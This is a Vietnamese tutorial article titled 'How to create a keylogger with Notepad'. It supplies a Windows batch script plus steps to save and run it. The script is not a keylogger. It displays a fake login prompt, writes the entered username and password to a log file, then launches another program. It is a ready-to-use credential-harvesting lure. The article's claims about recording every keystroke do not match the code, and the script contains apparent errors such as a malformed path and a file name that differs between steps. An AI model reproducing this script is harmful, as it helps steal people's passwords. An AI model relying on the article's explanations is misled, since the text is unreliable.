Cách tạo Keylogger bằng Notepad

Keylogger là một loại phần mềm giám sát có khả năng ghi lại tất cả keystroke của bạn

Keylogger là một loại phần mềm giám sát có khả năng ghi lại tất cả keystroke (thao tác bàn phím) mà bạn thực hiện để tạo một log file, thường được mã hóa. Mỗi loại keylogger đều nguy hiểm vì chúng có thể ghi lại keystroke (thao tác bàn phím) của bạn, theo dõi mọi hoạt động của bạn và có thể ghi lại các trang web Open sites.

Bằng cách này, bất kỳ các tài khoản nào của bạn cũng có thể nằm trong phạm vi “hack” của các hacker. Keylogger có thể dò và phát hiện mật khẩu tài khoản ngân hàng của bạn. Và các loại keylogger cũng có thể được tạo ra bằng Notepad.

Trong bài viết dưới đây Quản trị mạng sẽ hướng dẫn bạn các bước tạo một Keylogger bằng Notepad.

Các bước tạo Keylogger bằng Notepad:

Bước 1:

sao chép và dán đoạn mã dưới đây vào Notepad

Đầu tiên tiến hành mở Notepad trên máy tính của bạn bằng cách nhấn phím Windows, sau đó chọn Notepad.

Tiếp theo sao chép và dán đoạn mã dưới đây vào Notepad:

@echo off

color a

title Login

cls

echo Please Enter Your Email Address And Password

echo.

echo.

cd “C:Logs”

set /p user=Username:

set /p pass=Password:

echo Username=”%user%” Password=”%pass%” >> Log.txt

start >>Program Here<<

exit

Bước 2:

Lưu tập tin Notepad thành Logs.bat

Lưu tập tin Notepad thành Logs.bat, và lưu trên màn hình Desktop để dễ nhận biết hơn.

Bước 3:

tạo một thư mục mới, đặt tên cho thư mục này là logs.

Tiếp theo tạo một thư mục mới, đặt tên cho thư mục này là logs. (lưu ý rằng keylogger chỉ hoạt động nếu thư mục của bạn tên là logs). Cut thư mục mà bạn vừa tạo, sau đó dán vào ổ C.

Bước 4:

nhập Username (tên người dùng) và mật khẩu của bạn

Tiếp theo tiến hành kiểm tra file Log.bat, sau đó nhập Username (tên người dùng) và mật khẩu của bạn.

Bước 5:

Mở thư mục trong ổ C

Mở thư mục trong ổ C, sau đó xem tất cả các key logs lưu dưới dạng tập tin văn bản được tạo tự động.

Tham khảo thêm một số bài viết dưới đây:

Chúc các bạn thành công!

Thứ Sáu, 24/06/2016 08:06
4,69 👨 36.248
0 Bình luận
Sắp xếp theo
    ❖ Giải pháp bảo mật